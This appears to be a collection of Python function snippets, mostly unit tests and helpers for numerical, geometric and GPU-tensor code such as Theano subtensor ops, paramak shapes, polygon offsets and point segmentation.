grid,\n \"P\",\n 1,\n segments=[1],\n include_boundary_dofs=True,\n truncate_at_segment_edge=False,\n )\n\n eligible_index_pairs = set()\n\n for vertex_index in range(grid.number_of_vertices):\n neighbors = 
grid.vertex_neighbors.indices[\n grid.vertex_neighbors.indexptr[\n vertex_index\n ] : grid.vertex_neighbors.indexptr[vertex_index + 1]\n ]\n if 1 in grid.domain_indices[neighbors]:\n # Vertex adjacent an element with domain index 1\n for index_pair in zip(*_np.where(grid.elements == vertex_index)):\n eligible_index_pairs.add(index_pair)\n\n for local_index in range(3):\n for elem_index in range(grid.number_of_elements):\n if (local_index, elem_index) in eligible_index_pairs:\n assert space.local_multipliers[elem_index, local_index] == 1\n else:\n assert space.local_multipliers[elem_index, local_index] == 0", "def recolorPixels(x,y,px, newColorArray):\r\n for i in range(0+coeff1*x,coeff1+coeff1*x):\r\n for j in range(0+coeff1*y,coeff1+coeff1*y):\r\n px[i,j]=newColorArray[x][y]", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = gpuarray_shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = tensor.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = tensor.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def test_y_before_x(self):", "def test_sum_pos_2() -> None:\n # Note: We take 1 step (first item) - thus end up on square 2\n # (square 1 being home).\n assert nth(sw.sum_walk(), 0) == 1", "def test_pointnum1():\n shape = paramak.CapsuleVacuumVessel(outer_start_point=(0, 0), radius=300, thickness=10)\n assert len(shape.points) == 12\n assert len(shape.processed_points) == 13", "def segement_divide(pts,step=0.10, offset_x=0.01, offset_y=0.01):\n\n # Select the x and y of the points\n n = len(pts)\n \n z = 0.0\n \n points_plane = [] \n points_x = []\n paint_point = []\n\n for i in range(n):\n points_plane.append([pts[i][0], pts[i][1]])\n \n # Sorted the list according to x \n points_plane.sort(key=lambda x:x[0])\n\n # Segment the points according to x \n counter = 0 # Count the interval\n x_min = points_plane[0][0]\n x_max = points_plane[n-1][0]\n\n # The whole interval that needs to be divided\n upper = x_max + offset_x\n lower = x_min - offset_x\n lower_bound = lower\n \n # 
Set each segement's lower and upperbound\n while (lower_bound + step <= upper): \n # The break condition will be lower_bound > upper - step\n upper_bound = lower_bound + step\n\n # Find the index between lower bound and upper bound\n # First, find the index which x >= lower bound\n index = 0\n \n while (points_plane[index][0] < lower_bound): \n index = index + 1 # The index of the first point in the interval\n \n # If there is at least one point in the [lower_bound, upper_bound]\n if (points_plane[index][0] <= upper_bound): \n\n x_start = points_plane[index][0]\n y_max = points_plane[index][1]\n y_min = points_plane[index][1]\n \n while (points_plane[index][0] <= upper_bound): \n # The break condition will be x[index] > upper bound or index = n - 1\n # Compute the y max and y min in this interval\n \n if points_plane[index][1] > y_max: \n y_max = points_plane[index][1]\n\n if points_plane[index][1] < y_min:\n y_min = points_plane[index][1]\n \n if index < n - 1:\n index = index + 1\n else:\n break\n # The index of the last point in the interval, when index < n-1\n \n x_end = points_plane[index][0]\n\n paint_point.append([lower_bound,y_max+offset_y,z]) \n paint_point.append([lower_bound,y_min-offset_y,z])\n points_x.append([x_start, x_end])\n \n counter = counter + 1\n\n # Update interval\n lower_bound = upper_bound - offset_x\n \n # Deal with the last interval\n lower_bound_last = upper - step\n index_last = 0\n counter = counter + 1\n while ((index_last < n) and (points_plane[index_last][0] < lower_bound_last)): \n # The first point in the last interval\n index_last = index_last + 1\n \n if (index_last < n): \n # There is at least one point in the last interval\n x_start_last = points_plane[index_last][0]\n y_max_last = points_plane[index_last][1]\n y_min_last = points_plane[index_last][1]\n\n while ((index_last)<n) and (points_plane[index_last][0] <= upper):\n\n if points_plane[index_last][1] > y_max_last: \n y_max_last = points_plane[index_last][1]\n \n if points_plane[index_last][1] < y_min_last:\n y_min_last = points_plane[index_last][1]\n\n index_last = index_last + 1\n \n index_last = index_last - 1 # The index of the last point in the interval\n \n paint_point.append([lower_bound_last, y_max_last+offset_y, z])\n paint_point.append([lower_bound_last, y_min_last-offset_y, z])\n# paint_point.append([upper, y_max_last+offset_y, z])\n# paint_point.append([upper, y_min_last-offset_y, z])\n# return trans_to_end(paint_point)\n return paint_point", "def test_add_refpix():\n data = np.ones((10, 10))\n refpix = (2, 3, 4, 5)\n\n new_array = bpd.add_refpix(data, refpix)\n yd, xd = new_array.shape\n print, xd, yd\n\n assert yd == 19\n assert xd == 15\n assert np.all(new_array[0:5, 5] == np.array([0, 0, 0, 0, 1]))\n assert np.all(new_array[13:, 5] == np.array([1, 0, 0, 0, 0, 0]))\n assert np.all(new_array[5, 0:4] == np.array([0, 0, 1, 1]))\n assert np.all(new_array[5, 10:] == np.array([1, 1, 0, 0, 0]))", "def check_offset(self):\n\n for d in range(self.n_dmps):\n if abs(self.y0[d] - self.goal[d]) < 1e-4:\n self.goal[d] += 1e-4", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = 
f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_single_quadrant(self):", "def run_test(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n for ix in range(0, num_sight_lines+1):\n # Make impact parameters covering the full\n # particle in x\n x = ix / (1. * num_sight_lines) * smoothing\n \n pencilbeams.append(\n dict(x=x, y=0),\n )\n\n results = []\n for pencilbeam in pencilbeams:\n result = testsph(h=smoothing, dim=dim, **pencilbeam)\n results.append(result)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n particle_integral = integrate.trapz([x for x in results], [x['x'] for x in pencilbeams])\n \n # \"All smoothing lengths should integrate to the same value \"\n\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n traces.append(go.Scatter(y=[x for x in results], x=[y['x'] for y in pencilbeams]))\n\n # The mass of a particle should be the area under each of these curves(?)\n plot(traces)", "def segement_divide(pts,step=0.10, offset_x=0.01, offset_y=0.0):\n\n # Select the x and y of the points\n n = len(pts)\n \n z = pts[0][2]\n \n points_plane = [] \n points_x = []\n paint_point = []\n\n for i in range(n):\n points_plane.append([pts[i][0], pts[i][1]])\n \n # Sorted the list according to x \n points_plane.sort(key=lambda x:x[0])\n\n # Segment the points according to x \n counter = 0 # Count the interval\n x_min = points_plane[0][0]\n x_max = points_plane[n-1][0]\n\n # The whole interval that needs to be divided\n upper = x_max + offset_x\n lower = x_min - offset_x\n lower_bound = lower\n \n # Set each segement's lower and upperbound\n while (lower_bound + step <= upper): \n # The break condition will be lower_bound > upper - step\n upper_bound = lower_bound + step\n\n # Find the index between lower bound and upper bound\n # First, find the index which x >= lower bound\n index = 0\n \n while (points_plane[index][0] < lower_bound): \n index = index + 1 # The index of the first point in the interval\n \n # If there is at least one point in the [lower_bound, upper_bound]\n if (points_plane[index][0] <= upper_bound): \n\n x_start = points_plane[index][0]\n y_max = points_plane[index][1]\n y_min = points_plane[index][1]\n \n while (points_plane[index][0] <= upper_bound): \n # The break condition will be x[index] > upper bound or index = n - 1\n # Compute the y max and y min in this interval\n \n if points_plane[index][1] > y_max: \n y_max = points_plane[index][1]\n\n if points_plane[index][1] < y_min:\n y_min = points_plane[index][1]\n \n if index < n - 1:\n index = index + 1\n else:\n break\n # The index of the last point in the interval, when index < n-1\n \n x_end = points_plane[index][0]\n\n paint_point.append([lower_bound,y_max+offset_y,z]) \n paint_point.append([lower_bound,y_min-offset_y,z])\n points_x.append([x_start, x_end])\n \n counter = counter + 1\n\n # Update interval\n lower_bound = upper_bound - offset_x\n \n # Deal with the last interval\n lower_bound_last = upper - step\n index_last = 0\n counter = counter + 1\n while ((index_last < n) and (points_plane[index_last][0] < lower_bound_last)): \n # The first point in the 
last interval\n index_last = index_last + 1\n \n if (index_last < n): \n # There is at least one point in the last interval\n x_start_last = points_plane[index_last][0]\n y_max_last = points_plane[index_last][1]\n y_min_last = points_plane[index_last][1]\n\n while ((index_last)<n) and (points_plane[index_last][0] <= upper):\n\n if points_plane[index_last][1] > y_max_last: \n y_max_last = points_plane[index_last][1]\n \n if points_plane[index_last][1] < y_min_last:\n y_min_last = points_plane[index_last][1]\n\n index_last = index_last + 1\n \n index_last = index_last - 1 # The index of the last point in the interval\n \n paint_point.append([lower_bound_last, y_max_last+offset_y, z])\n paint_point.append([lower_bound_last, y_min_last-offset_y, z])\n# paint_point.append([upper, y_max_last+offset_y, z])\n# paint_point.append([upper, y_min_last-offset_y, z])\n# return trans_to_end(paint_point)\n return paint_point", "def test_scaffold_filtering(self, n_test_points=100):\n device = \"cuda\"\n func = self._get_simple_implicit_function().to(device)\n\n def scaffold(points):\n \"\"\"'\n Function to deterministically and randomly enough assign a point\n to empty or occupied space.\n Return 1 if second digit of sum after 0 is odd else 0\n \"\"\"\n return (\n ((points.sum(dim=-1, keepdim=True) * 10**2 % 10).long() % 2) == 1\n ).float()\n\n def new_density(points):\n # check if all passed points should be passed here\n assert torch.all(scaffold(points)), (scaffold(points), points.shape)\n return points.sum(dim=-1, keepdim=True)\n\n def new_color(points, camera, directions, non_empty_points, num_points_per_ray):\n # check if all passed points should be passed here\n assert torch.all(scaffold(points)) # , (scaffold(points), points)\n return points * 2\n\n # check both computation paths that they contain only points\n # which are not in empty space\n func._get_density = new_density\n func._get_color = new_color\n func.voxel_grid_scaffold.forward = scaffold\n func._scaffold_ready = True\n\n bundle = ImplicitronRayBundle(\n origins=torch.rand((n_test_points, 2, 1, 3), device=device),\n directions=torch.rand((n_test_points, 2, 1, 3), device=device),\n lengths=torch.rand((n_test_points, 2, 1, 4), device=device),\n xys=None,\n )\n points = ray_bundle_to_ray_points(bundle)\n result_density, result_color, _ = func(bundle)\n\n # construct the wanted result 'by hand'\n flat_points = points.view(-1, 3)\n expected_result_density, expected_result_color = [], []\n for point in flat_points:\n if scaffold(point) == 1:\n expected_result_density.append(point.sum(dim=-1, keepdim=True))\n expected_result_color.append(point * 2)\n else:\n expected_result_density.append(point.new_zeros((1,)))\n expected_result_color.append(point.new_zeros((3,)))\n expected_result_density = torch.stack(expected_result_density, dim=0).view(\n *points.shape[:-1], 1\n )\n expected_result_color = torch.stack(expected_result_color, dim=0).view(\n *points.shape[:-1], 3\n )\n\n # check that thre result is expected\n assert torch.allclose(result_density, expected_result_density), (\n result_density,\n expected_result_density,\n )\n assert torch.allclose(result_color, expected_result_color), (\n result_color,\n expected_result_color,\n )", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def 
test_point_within_dimensions_border():\n point = np.array([100, 20])\n image_dimensions = np.array([100, 100])\n assert not point_within_dimensions(point, image_dimensions)", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = cuda.shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = T.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = T.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, cuda.GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def test(p):\n while p.quadrant() != TOP_RIGHT_QUAD:\n if p.x < 0:\n p = p.reflect_y()\n else:\n p = p.reflect_x()\n return p", "def wiggle_breakpoints(y, xi, segment_bdy3, wiggle_width=5, num_iterations=1,\n verbose=False, log_func=sys.stdout.write):\n t0 = time.time()\n count = 0\n segment_bdy4 = map(tuple, segment_bdy3)\n while count < num_iterations:\n did_nothing = True\n bps = [x[0] for x in segment_bdy4] + [segment_bdy4[-1][1]]\n new_bps = [0]\n for index in xrange(1, len(bps)-1):\n b = bps[index]\n lpos = new_bps[index-1]\n rpos = bps[index+1]\n\n wiggle_width = 5\n if b - lpos == 1 or rpos - b == 1:\n new_bps.append(b)\n continue\n lwiggle = max(b-wiggle_width, lpos+1)\n rwiggle = min(b+wiggle_width, rpos-1)\n delta_lls = []\n for pos in xrange(lwiggle, rwiggle):\n lpts = y[lpos:pos]\n rpts = y[pos:rpos]\n allpts = y[lpos:rpos]\n\n lxi = xi[lpos:pos]\n rxi = xi[pos:rpos]\n allxi = xi[lpos:rpos]\n\n mu_l = np.clip(lpts.sum( )/lxi.sum( ), 1e-2, None)*lxi\n mu_r = np.clip(rpts.sum( )/rxi.sum( ), 1e-2, None)*rxi\n mu_all = np.clip(allpts.sum( )/allxi.sum( ), 1e-2, None)*allxi\n\n delta_ll = ((-mu_l + lpts*np.log(mu_l)).sum( ) +\n (-mu_r + rpts*np.log(mu_r)).sum( ) -\n (-mu_all + allpts*np.log(mu_all)).sum( ))\n delta_lls.append(delta_ll)\n new_b = lwiggle + np.argmax(delta_lls)\n try:\n gain = (delta_lls[new_b-lwiggle] - delta_lls[b-lwiggle])\n except:\n print \"-\"*40\n print lpos, b, rpos\n print \"argmax\", np.argmax(delta_lls), len(delta_lls)\n print \"wiggle\", lwiggle, rwiggle\n print new_b-lwiggle, b-lwiggle\n raise Exception(\"Wiggling breakpoints produced an invalid breakpoint configuration\")\n new_bps.append(new_b)\n if new_b != b:\n did_nothing = False\n if verbose:\n print \"%6d -> %6d : (%2d) gain +%.2f\"%(b, new_b, delta_lls[b-lwiggle], gain)\n new_bps.append(bps[-1])\n assert len(new_bps) == len(bps)\n segment_bdy4 = [(new_bps[i], new_bps[i+1]) for i in xrange(0, len(new_bps)-1)]\n count += 1\n if did_nothing:\n break\n log_func(\"%.2f s spent wiggling, %d iterations\\n\"%(time.time()-t0, count))\n return segment_bdy4", "def test_sinc_array():\n x,sc = cw04.gen_sinc_array(1,3,3)\n desired = ([0.8414709848078965, .45464871 , 0.04704000])\n print(\"Obtained:\",sc)\n print(\"Desired:\",desired)\n # For comparing floating point values, nose has useful helper functions\n # to ensure they are equal up to a numerical precision tolerance\n np.testing.assert_almost_equal(sc, desired)", "def test_get_xy_space():\n pass", "def layer_offsets(self):\n ...", "def inner_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(c, coordination(c, stencil=stencil) < len(stencil))", "def offset(x, y, L):\n length = x.size\n 
offsetx = np.zeros((length, 2))\n offsety = np.zeros((length, 2))\n dx = np.zeros(length-1)\n dy = np.zeros(length-1)\n dxL = np.zeros(length-1)\n dyL = np.zeros(length-1)\n xl = np.zeros(length) # counterclockwise\n xr = np.zeros(length) # clockwise\n yl = np.zeros(length)\n yr = np.zeros(length)\n xl0 = np.zeros(length)\n xr0 = np.zeros(length)\n yl0 = np.zeros(length)\n yr0 = np.zeros(length) \n for i in range(0, length-1):\n dx[i] = x[i+1]-x[i]\n dy[i] = y[i+1]-y[i]\n for i in range(0, length-1):\n r = np.sqrt(dx[i]**2 + dy[i]**2)\n dxL[i] = dx[i]*L/r\n dyL[i] = dy[i]*L/r\n xl0[i] = -dyL[i] + x[i]\n yl0[i] = dxL[i] + y[i]\n xr0[i] = dyL[i] + x[i]\n yr0[i] = -dxL[i] + y[i]\n xl0[length-1] = xl0[length-2] + dx[length-2]\n yl0[length-1] = yl0[length-2] + dy[length-2]\n xr0[length-1] = xr0[length-2] + dx[length-2]\n yr0[length-1] = yr0[length-2] + dy[length-2]\n xl[0] = xl0[0]\n yl[0] = yl0[0]\n xl[length-1] = xl0[length-1]\n yl[length-1] = yl0[length-1]\n xr[0] = xr0[0]\n yr[0] = yr0[0]\n xr[length-1] = xr0[length-1]\n yr[length-1] = yr0[length-1]\n for i in range(1, length-1):\n a = np.array([[dy[i-1], -dx[i-1]], [dy[i], -dx[i]]])\n bl = np.array([dy[i-1]*xl0[i-1]-dx[i-1]*yl0[i-1], dy[i]*xl0[i]-dx[i]*yl0[i]])\n br = np.array([dy[i-1]*xr0[i-1]-dx[i-1]*yr0[i-1], dy[i]*xr0[i]-dx[i]*yr0[i]])\n theta = (dx[i-1]*dx[i]+dy[i-1]*dy[i])/(dx[i-1]**2+dy[i-1]**2)**0.5/(dx[i]**2+dy[i]**2)**0.5\n if theta > 1 - 1e-10:\n xl[i] = xl0[i]\n yl[i] = yl0[i]\n xr[i] = xr0[i]\n yr[i] = yr0[i]\n else:\n pl = np.linalg.solve(a, bl)\n xl[i] = pl[0]\n yl[i] = pl[1]\n pr = np.linalg.solve(a, br)\n xr[i] = pr[0]\n yr[i] = pr[1]\n offsetx[:, 0], offsetx[:, 1] = xl, xr\n offsety[:, 0], offsety[:, 1] = yl, yr\n return offsetx, offsety", "def sample_pin_position_range():\n #Create a sample goniometer\n g = TopazInHouseGoniometer()\n\n #Initialize the leg limits\n g.relative_sample_position = column([0.0, 0.0, 0.0])\n g.getplatepos(0.0, 0.0, 0.0)\n g.calculate_leg_xy_limits(visualize=True)\n\n# if True:\n# pylab.show()\n# return\n\n n = 17\n positions = np.linspace(-8, 8, n) #Range calculated in mm\n allowed = np.zeros( (n,n,n) )\n for (ix, x) in enumerate(positions):\n print \"Calculating x\", x\n for (iy, y) in enumerate(positions):\n for (iz, z) in enumerate(positions):\n #Set up\n g.relative_sample_position = column([x, y, z])\n allowed[ix,iy,iz] = g.are_angles_allowed([0., 0., 0.], return_reason=False)\n\n #Do a plot\n\n pylab.figure(1, figsize=[15,15])\n pylab.title(\"Allowable XZ sample positions\")\n for (iy, y) in enumerate(positions):\n print \"At y of\", y, \", # of points = \", np.sum( allowed[:, iy,:])\n if iy < 16:\n pylab.subplot(4,4,iy+1)\n pylab.pcolor(positions, positions, allowed[:, iy, :].transpose(), norm=pylab.Normalize(0, 1))\n pylab.xlabel(\"x\")\n pylab.ylabel(\"z\")\n pylab.title(\"y = %.3f mm\" % y)\n pylab.draw()\n pylab.axis('equal')\n pylab.show()\n #pylab.", "def test_elemwise4():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.fvector()\r\n c = tensor.fvector()\r\n f = pfunc([b, c], [],\r\n updates=[(a, (a + b.dimshuffle('x', 0) * c.dimshuffle(0, 'x')))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(numpy.random.rand(4), dtype='float32'),\r\n theano._asarray(numpy.random.rand(3), 
dtype='float32'))", "def test_pointnum3():\n shape = paramak.CapsuleVacuumVessel(outer_start_point=(1000, -500), radius=5000, thickness=50)\n assert len(shape.points) == 12\n assert len(shape.processed_points) == 13", "def outconvex2d(x, p)->int:\r\n\r\n n = np.shape(p)[1]\r\n\r\n # form A, B such that internal points satisfy Ax <= B\r\n A = np.array([[p[1, 1:n] - p[1, 0:n-1]],\r\n [p[0, 0:n-1] - p[0, 1:n]]]).T\r\n\r\n B = np.zeros((n-1, 1))\r\n\r\n for i in range(n-1):\r\n B[i] = A[i, :] * p[:, i]\r\n \r\n out = np.sum(A*x > np.tile(B[:, 0], (1, np.shape(x)[1])))", "def test_get_debug_values_success():\r\n\r\n prev_value = config.compute_test_value\r\n for mode in ['ignore', 'warn', 'raise']:\r\n\r\n try:\r\n config.compute_test_value = mode\r\n\r\n x = T.vector()\r\n x.tag.test_value = numpy.zeros((4,), dtype=config.floatX)\r\n y = numpy.zeros((5, 5))\r\n\r\n iters = 0\r\n\r\n for x_val, y_val in op.get_debug_values(x, y):\r\n\r\n assert x_val.shape == (4,)\r\n assert y_val.shape == (5, 5)\r\n\r\n iters += 1\r\n\r\n assert iters == 1\r\n\r\n finally:\r\n config.compute_test_value = prev_value", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def check_ext(im, i, j):\n neighb = 0\n count = 0\n for a in range(8):\n if (im[i+relpos[a][0], j+relpos[a][1]] and (count == 0)):\n count += 1\n neighb += 1\n else:\n count = 0\n return (neighb < 2)", "def test_endpoint_slope(b,c,d,x_n_minus_1,x_n,expected_slope):\n\tactual_slope = b + 2*c*(x_n-x_n_minus_1) + 3*d*(x_n-x_n_minus_1)**2\n\tresult = abs(actual_slope-expected_slope)<0.001\n\treturn(result)", "def test_sipm_indx(mc_sns_sipm_map):\n XL = mc_sns_sipm_map.sipm_map.xl.values\n XR = mc_sns_sipm_map.sipm_map.xr.values\n YU = mc_sns_sipm_map.sipm_map.yu.values\n YD = mc_sns_sipm_map.sipm_map.yd.values\n\n DX = [xr - xl if xl != NN and xr != NN else 2 for xl,xr in zip(XL, XR) ]\n t1 = np.allclose(DX, 2, rtol=1e-03, atol=1e-03)\n return t1", "def test_local_useless_inc_subtensor_increment_zeros():\n y = matrix(\"y\")\n\n s = at.zeros((2, 2))[:, :]\n o_shape = inc_subtensor(s, specify_shape(y, s.shape))\n\n mode = get_default_mode().including(\"local_useless_inc_subtensor\")\n f_shape = function([y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert not any(isinstance(n.op, IncSubtensor) for n in topo)", "def test_pad_8():\n paddle.disable_static()\n x = np.array([[[[1.0, 3.0], [-3.0, 1.0]]]])\n pad = [1, 1, 1, 2]\n mode = \"constant\"\n value = np.array(2.0)\n data_format = \"NCHW\"\n res = np.array(\n [\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 1.0, 3.0, 2.0],\n [2.0, -3.0, 1.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ]\n ]\n ]\n )\n exp = paddle.nn.functional.pad(\n x=paddle.to_tensor(x), pad=pad, mode=mode, value=paddle.to_tensor(value), data_format=data_format\n )\n assert np.allclose(exp.numpy(), res)", "def pixel(self, x: int, y: int, colour: int, /) -> None:", "def _force_non_integer_offsets(dx, dy, epsilon=1e-4):\n # Copy the input 
offsets\n outDx = np.array(copy.deepcopy(dx), dtype=float)\n outDy = np.array(copy.deepcopy(dy), dtype=float)\n\n # Repeatedly add epsilon to the offsets until none of them are integers\n addEpsilon = True\n while addEpsilon:\n # Check for any perfectly integer shifts\n for dx1, dy1 in zip(outDx, outDy):\n # If an integer pixel shift is found, then add tiny shift and\n # try again.\n if dx1.is_integer() or dy1.is_integer():\n addEpsilon = True\n outDx += epsilon\n outDy += epsilon\n break\n else:\n # If the loop completed, then no epsilon addition necessary!\n addEpsilon = False\n\n return outDx, outDy", "def test_elemwise2():\r\n rng = numpy.random.RandomState(int(time.time()))\r\n shape = (3, 5)\r\n for pattern in [(0, 1), (1, 0)]:\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), name=None)\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle(pattern))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32') * .3)\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle([2, 0, 3, 1]) *\r\n tensor.exp(b ** a).dimshuffle([2, 0, 3, 1]))], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32'))", "def footprint_corner_indices():", "def outer_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(np.logical_not(c),\n coordination(c, stencil=stencil) > 0)", "def test_compute_pixel_ray_directions_vectorized_invalid_focal_lengths() -> None:\n uv: NDArrayInt = np.array([[12, 2], [12, 2], [12, 2], [12, 2]])\n fx = 10\n fy = 11\n\n img_w = 20\n img_h = 10\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n\n with pytest.raises(ValueError):\n pinhole_camera.compute_pixel_ray_directions(uv)", "def test_set_vx_to_vx_plus_vy(self, cpu):\n for x in range(0x0, 0xF):\n for y in range(0x0, 0xF):\n if x != y:\n cpu.opcode = 0x8004 | (x << 8) | (y << 4)\n for v1 in range(0x0, 0xFF):\n for v2 in range(0x0, 0xFF):\n cpu.V_register[x] = v1\n cpu.V_register[y] = v2\n cpu.set_vx_to_vx_plus_vy()\n value = v1 + v2\n if value > 0xFF:\n assert(cpu.V_register[0xF] == 1)\n assert(cpu.V_register[x] == value & 0xFF)\n else:\n assert(cpu.V_register[0xF] == 0)\n assert(cpu.V_register[x] == value)", "def test_distance(layout, gain_calc):\n def direct_gains(size, distance):\n block_format = AudioBlockFormatObjects(position=dict(azimuth=0, elevation=0, distance=distance),\n width=size, height=size)\n return gain_calc.render(ObjectTypeMetadata(block_format)).direct\n\n for size in [0, 30]:\n distances = np.linspace(0, 1, 10)\n pvs = np.array([direct_gains(size, distance) for distance in distances])\n ev_len = np.linalg.norm(np.square(pvs).dot(layout.norm_positions), axis=1)\n assert np.all(np.diff(ev_len) > 0)", 
